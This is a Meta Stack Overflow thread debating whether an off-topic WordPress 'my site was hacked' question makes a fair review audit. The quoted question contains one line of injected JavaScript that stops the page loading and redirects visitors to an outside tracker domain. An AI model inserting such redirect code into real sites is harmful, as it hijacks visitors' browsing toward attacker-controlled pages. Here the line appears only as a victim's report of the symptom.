# How is this question about programming? Surely it is not a good audit question

Tags: discussion, disputed-review-audits, specific-audit

https://stackoverflow.com/review/first-questions/34197937

> Until yesterday my site was working fine, I don't know what happens from morning, site is not opening, when I try to open it's automatically redirecting to tracking line site then to some other website, when I try to login for wp-admin it shows this error:
>
> ```
> window.stop();var step = "https://away.trackersline.com/away.php?id=43436-22-4734573234"; document.location.href=step; window.location.replace(step);
> ```
>
> What is this? And what happened to my site? How can I get it back? and How can I protect my site from this kind of hacks?

It could have been hacked or it could have been WordPress updates.  Where is the code?  To me it looks like it belongs on *[Webmasters](https://webmasters.stackexchange.com/tour)*.   And it has multiple questions!!

I have downvoted for the sake of others.

I think it should be removed as an audit question.

Comment: It's one of those questions where it's a wide-spread temporary problem with something else that many people have. Unfortunately, those are common. Further unfortunately, due to the "I have this problem as well" votes that rain in, the system often picks them as audits, as well.

Comment: So you've removed it from "known good" audit by casting downvote... Do you have other concerns (question is probably on-par with others in the "wordpress" tag... and have it even has some sort of code somewhat making it close to SO... (don't really care to check).

Comment: @AlexeiLevenkov, I wasn't sure that downvote was enough, so I was flagging it incase.

Comment: The [vote summaries](https://stackoverflow.com/posts/75886751/timeline?filter=WithVoteSummaries) on that question seem to suggest that the question already had _two downvotes_ when it was admitted as an audit. So it does require more than a single downvote to prevent a question from taking part in audits.

Comment: @E_net4 this ..."feature"... of being able to select downvoted questions as audits appears to be new to the revamped "First questions" queue (and has been seen multiple times previously in this queue); they are not used as audits in, for instance, the close votes queue.

Comment: +14/-13, 5k views, 13 answers in a short period (10 deleted)... how on earth.... This seems dumb enough to merit some kind of public announcement somewhere to knock it into peoples' heads just how blatantly off-topic this kind of question is.

Comment: It looks like the corresponding news topic is [here](https://arstechnica.com/information-technology/2023/03/hackers-exploit-wordpress-plugin-flaw-that-gives-full-control-of-millions-of-sites/). And of course, people are going to say "but you let the *Github* question stay up...".

Comment: Actually, hold on. [OP of the question](https://stackoverflow.com/users/16185063/kalyan-paul) has asked questions before, and has had the account for almost 2 years. How does this get into the "first questions" queue?

Comment: According to a post over in the SG Teams, the classification to *not* be a first asker is *"it is required for a user to have either at least 3 published questions, regardless of their score, or to have one question with a score of at least 3 not to be considered a new asker"* @KarlKnechtel . So as the OP has 2 prior questions, with a combined score of 1, they were still considered a "first asker".

Comment: @KarlKnechtel It was never *really* in the First Questions queue. The "known good" audits for that queue aren't required to have been in the queue for an *actual* review. I mean, I've seen Jon Skeet answers used as audits in LQA (or maybe First Posts - but the point is the same). [See the timeline](https://stackoverflow.com/posts/75886751/timeline).

Comment: Hmm. 15 downvotes **today**. That's some Meta Effect!

Comment: Somewhat O/T: although the linked question was downvoted and closed, one of the answers currently has (net) 14 upvotes. Does the author of that answer still get credit even though the question was closed for being off topic?

Comment: @skomisa Yes, until the question is not deleted (or his answer), he keep all reputation he received from it

Comment: _" And it has multiple questions!"_ - I've explained in [your previous question](https://meta.stackoverflow.com/a/423968) when that isn't the case. Tread carefully.

Comment: @Elikill58 Even if deleted, the OP (*might*) stay with the rep collected. I vaguely remember that the threshold is at least 30 days old and at least 3 upvotes, rep is remained intact even if post is deleted (but those numbers might differ)

Comment: Use your delete votes, people.

Answer (score 5):

So, there's a Catch-22 on this

1. The question is off-topic. We don't handle Wordpress administration, nor is this on-topic for Wordpress.SE (they don't handle plugin problems). The question is closed and should remain so
2. It has a fairly useful answer and lots of traffic.

We could just delete it (which removes it as an audit), but the problem with issues like this one is that people have a tendency to flood the site with similar questions.

To that end, I've negated the delete votes for now. There haven't been any First Question audits since you posted this, and it may be removable in the future. But for now, I'll leave it as a signpost to limit copycats, just as we would any service outage.

Comment: Did you remove previous failed audit?

Comment: @Elikill58 Mods can't actually remove bad audits directly, we just know what can get them removed (like deletion). If someone was actually harmed by a bad audit (as in review banned), they should post about it on Meta and only then can we do something about it.

Comment: @Machavity - We are back to square one then. Because of poor audit questions, reviews suffer and are even delayed.  Just look at 1000s backlogged in some queues.  Should it not be migrated to SuperUser?  I would suggest that new users are going to flood the site regardless - they wont be looking for existing questions.  Some of this could be avoided if there was a notice for first questions (and first answers) - in their face- reminding them of key rules.

Comment: @RohitGupta Preaching to the choir there on some of that. I agree the audit is bad, but SE seems OK with highly upvoted questions being used like this, with the edge cases being these highly upvoted off-topic questions (which are thankfully rare). Again, this often happens [with service outages](https://stackoverflow.com/questions/74258160/is-jcenter-down-permanently-31-oct). If you have a suggestion to make the system as a whole better, I would suggest posting it on [Meta Stack Exchange](//meta.stackexchange.com)

Comment: This is not on-topic for Super User, by the way.